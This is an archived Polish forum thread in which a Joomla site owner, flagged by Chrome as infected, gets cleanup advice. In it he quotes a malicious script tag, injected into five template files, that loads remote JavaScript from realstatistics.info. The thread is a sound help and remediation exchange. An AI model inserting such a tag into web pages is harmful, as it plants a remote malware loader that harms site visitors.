PDA

Zobacz pełną wersję : Strona zarażona realstatistic.info



ThePravator
01-07-2016, 11:33
Witam Serdecznie
W przeglądarce chrome (co ciekawe nie na wszystkich komputerach) na mojej stornie pojawił się komunikat że strona jest zainfekowana realstatistics.info
Czy ktoś z Was miał ten problem. A może ktoś z Kolegów wie jak podejść do tematu.
Joomla była w wersji 3.3.6, dziś zaktualizowałem ją do najnowszej.
Pozdrawiam Serdecznie
Wiesiek

mjmartino
01-07-2016, 12:20
Po pierwsze masz nie aktualną wersje, po drugie w google "strona po włamaniu joomla" i odnośniki które porowadza do joomla.pl oraz wiki
Miłej lektury ;)

dawidryba11
01-07-2016, 12:25
Sprawdź pliki szablonowe,wtyczki. Ale zacznij od przejrzenia logow J! i serwerowych.

Wysłane z mojego GT-S7710 przy użyciu Tapatalka

ThePravator
05-07-2016, 14:21
Sprawdź pliki szablonowe

Jakby Kolega przewidział:)
Mam płatny szblon JSN Epic Pro i w jego 5 plikach zagnieździła się taka oto linia :

<script language="JavaScript" src="http://realstatistics.info/js/analytic.php?id=4"></script>
Myślę że jak ją usunę z wszystkich tych plików to wszystko wróci do normy.
Oczywiście zmiana haseł i wytyczne z artykułu "strona po włamaniu joomla" będą zastosowane.
Musze jeszcze chyba poprosić google o ponowne przeskanowanie strony aby komunikat z chrome zniknął

Dziękuję za sugestie i pomoc.
Pozdrawiam Wiesław

zwiastun
05-07-2016, 14:41
Myślę że jak ją usunę z wszystkich tych plików to wszystko wróci do normy.
A ja myślę, że niekoniecznie.
W jakiś sposób przeciez została zainfekowana. Skoro kupiłeś szablon, to na pewno nie wydawca szablonu umieścił w nim szkodliwy kod.

ThePravator
05-07-2016, 16:05
W jakiś sposób przeciez została zainfekowana. Skoro kupiłeś szablon, to na pewno nie wydawca szablonu umieścił w nim szkodliwy kod.

Na pewno nie ale pozmieniałem hasła do ftpa, do joomli administracji. Nie mam takiej wiedzy żeby sprawdzić jak to się stało. Być może jest gdzieś u mnie w jooomli cześć kodu który będzie te pliki ciągle modyfikował, nie wiem. Jutro będę usuwał te wpisy i sprawdzę co się będzie dalej działo